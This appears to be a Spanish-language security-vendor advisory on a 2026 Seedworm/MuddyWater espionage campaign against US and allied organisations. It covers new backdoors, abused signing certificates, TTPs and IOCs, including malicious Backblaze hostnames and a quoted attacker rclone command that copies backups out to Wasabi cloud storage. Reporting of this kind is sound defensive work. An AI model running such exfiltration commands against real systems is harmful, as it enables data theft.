A principios de esta semana escribimos una entrada en el blog sobre los asuntos cibernéticos en medio de la guerra de Estados Unidos e Israel contra Irán, llamada Operación Furia Épica. En ella observábamos que se produciría una respuesta elevada por parte de los actores de amenazas patrocinados por el Estado, contra las organizaciones occidentales con presencia en Oriente Medio como represalia por estos ataques.
Sin embargo, análisis recientes de investigadores de inteligencia de amenazas revelan un notable aumento de la actividad cibernética maliciosa desde nuestra última entrada en el blog, atribuida al grupo de amenazas persistentes avanzadas (APT) alineado con el Estado iraní Seedworm (también conocido como MuddyWater, Temp Zagros o Static Kitten). Esta actividad ha afectado directamente a varias organizaciones estadounidenses de sectores críticos y coincide con el aumento de las tensiones geopolíticas tras las recientes acciones militares en Oriente Próximo.
1. Organizaciones estadounidenses y aliadas atacadas
La actividad de Seedworm, detectada por primera vez a principios de febrero de 2026, se ha observado en varias redes de alto valor:
- Un banco estadounidense
- Un aeropuerto estadounidense
- una empresa de software estadounidense (con presencia israelí)
- Organizaciones sin ánimo de lucro de Estados Unidos y Canadá.
Estas intrusiones han continuado a principios de marzo, lo que indica una campaña activa y en curso.
2. Backdoors y malware recientemente identificados
Los investigadores identificaron múltiples familias de malware desplegadas en los entornos de las víctimas:
- Puerta trasera Dindoor:
o Previamente desconocido
o Utiliza el tiempo de ejecución Deno JavaScript/TypeScript
o Se encontró en la sucursal israelí de la empresa de software atacada, en un banco estadounidense y en una organización sin ánimo de lucro canadiense.
o Firmado con un certificado emitido a nombre de "Amy Cherne".
- Fakeset backdoor (basado en Python):
o Encontrado en el aeropuerto de EE.UU. y en otra organización sin ánimo de lucro
o Firmado con certificados vinculados a "Amy Cherne" y "Donald Gay" (utilizados anteriormente en el malware Seedworm)
- Cadena de malware Stagecomp → Darkcomp:
o También firmado con el certificado "Donald Gay"
o Vinculada a Seedworm por los principales proveedores, incluidos Google, Microsoft y Kaspersky.
Estos implantes de malware demuestran un conjunto de herramientas diverso e indican un objetivo deliberado de la cadena de suministro, financiero y de infraestructuras críticas.
3. Intentos de filtración de datos
En al menos un caso, los atacantes intentaron extraer datos de la empresa de software atacada utilizando Rclone a un cubo de almacenamiento en la nube Wasabi, aunque el éxito de este intento sigue sin confirmarse.
4. Infraestructura y distribución
- La distribución del malware utilizó los servidores de almacenamiento en la nube de Backblaze, lo que indica que Seedworm utilizó una infraestructura en la nube de buena reputación para el mando y control y la distribución de la carga útil.
- El uso de certificados de codificación (incluidos los maliciosos observados anteriormente) sugiere un esfuerzo persistente por parecer legítimo y eludir la detección.
TTP (Tácticas, Técnicas y Procedimientos) e IOC (Indicadores de Compromiso)
MuddyWater evoluciona constantemente para eludir la detección, aprovechando una combinación de malware personalizado y técnicas de "vivir de la vida".
- Acceso inicial:Utiliza principalmente spearphishing con documentos habilitados para macros (ZIP, PDF, XLSM), a menudo utilizando señuelos como falsas ofertas de trabajo.
- Ejecución y persistencia:Utiliza en gran medida PowerShell ofuscado, carga lateral de DLL (por ejemplo, goopdate.dll) y herramientas RMM como Atera o ScreenConnect. A menudo compilan el código en las máquinas objetivo para evitar la detección basada en archivos.
- Arsenal de malware:Despliega herramientas como POWERSTATS, Mori, Canopy (Starwhale), MuddyRot, UDPGangster y Phoenix.
- Evasión de la defensa:Utiliza herramientas antianálisis y antiforense, como la detección de sandbox y la limpieza de registros.
Campañas y desarrollos recientes (2025-2026)
- Operación Olalampo (febrero de 2026):Dirigida a entidades de alto perfil.
- Objetivos:Las campañas en curso se dirigen a entidades financieras y gubernamentales occidentales y de Oriente Medio.
- Móviles:Vinculado a DCHSpy, un programa espía modular para Android.
1. Familias de malware / puertas traseras
Estas familias de malware se observaron en múltiples redes de víctimas estadounidenses, canadienses e israelíes:
- Dindoor Backdoor: puerta trasera desconocida hasta ahora que utiliza el tiempo de ejecución Deno JavaScript/TypeScript.
- Fakeset Backdoor - puerta trasera basada en Python desplegada en redes de aeropuertos y organizaciones sin ánimo de lucro de Estados Unidos.
- Stagecomp Loader → Darkcomp Backdoor - Stagecomp deja caer y carga Darkcomp; vinculado a Seedworm por Google, Microsoft y Kaspersky.
2. Certificados de firma de código maliciosos
Seedworm es conocido por abusar de certificados de firma de código fraudulentos o comprometidos. Los siguientes estaban directamente relacionados con esta campaña:
- Certificado emitido a nombre de "Amy Cherne", utilizado para firmar las puertas traseras Dindoor y Fakeset.
- Certificado emitido a nombre de "Donald Gay" - utilizado para firmar el malware Fakeset y Stagecomp, visto anteriormente en la actividad de Seedworm.
3. Infraestructura maliciosa o sospechosa
Alojamiento de la carga útil (Backblaze B2 Cloud Storage)
Utilizados como servidores de distribución de malware:
- gitempire.s3.us-east-005.backblazeb2.com
- elvenforest.s3.us-east-005.backblazeb2.com
Destino de la exfiltración de datos (Rclone a Wasabi Cloud Storage)
- Intento de exfiltración usando:
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[ELIMINADO]:/192.168.0.x
Esta campaña muestra una clara intención por parte de los actores de amenazas iraníes de infiltrarse en las redes de Estados Unidos y sus aliados en los sectores de las finanzas, la aviación, el software y las organizaciones sin ánimo de lucro. La combinación de nuevas puertas traseras, familias de malware conocidas, C2 basado en la nube e intentos de exfiltración sugiere un enfoque operativo en varias etapas, probablemente dirigido al acceso a largo plazo, el espionaje o futuras acciones disruptivas.
Si le preocupa alguna de las amenazas descritas en este boletín o necesita ayuda para determinar qué medidas debe tomar para protegerse de las amenazas más importantes a las que se enfrenta su organización, póngase en contacto con su gestor de cuentas o, alternativamente, póngaseen contacto con nosotrospara averiguar cómo puede proteger su organización.